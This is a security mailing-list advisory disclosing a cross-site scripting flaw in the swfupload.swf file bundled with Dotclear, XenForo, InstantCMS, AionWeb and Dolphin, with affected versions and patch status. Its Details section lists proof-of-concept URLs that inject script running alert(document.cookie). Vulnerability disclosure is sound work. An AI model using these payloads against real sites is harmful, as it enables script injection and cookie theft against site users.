Hello list! I will draw your attention to XSS vulnerability in other web applications with swfupload. Earlier I've wrote about swfupload in WordPress (CVE-2012-3414) and that this hole is available in many web applications.
In previous letter I've wrote the information about different versions of this swf-file (with different names) and all versions of WordPress, which contain any of these swf-files. And here is information about Dotclear, XenForo, InstantCMS, AionWeb, Dolphin - among multiple web applications which are bundled with swfupload.swf. ------------------------- Affected products: ------------------------- Vulnerable are potentially all versions of Dotclear, InstantCMS, AionWeb, Dolphin. There is no information that they have fixed this vulnerability in their software (at that this vulnerability was fixed in WordPress 3.3.2 at 20.04.2012). Vulnerable are versions XenForo 1.0.0 - 1.1.2. In XenForo 1.1.3 this vulnerability was fixed and patch was released for previous versions (already at 19.06.2012). The developers of WordPress released new version of flash file (the same did the developers of XenForo), which could be used by all web developers, which were using swfupload. ---------- Details: ---------- XSS (WASC-08): Dotclear: http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// XenForo: http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// InstantCMS: http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// AionWeb: http://site/engine/classes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// Dolphin: http://site/plugins/swfupload/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// Swfupload is used in WordPress, plugins for WP and in other web applications. There are many web applications with it, not as many as those which are using JW Player (http://securityvulns.com/docs28176.html) and JW Player Pro (http://securityvulns.com/docs28483.html) (vulnerabilities in them I've disclosed earlier), but still a lot of. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/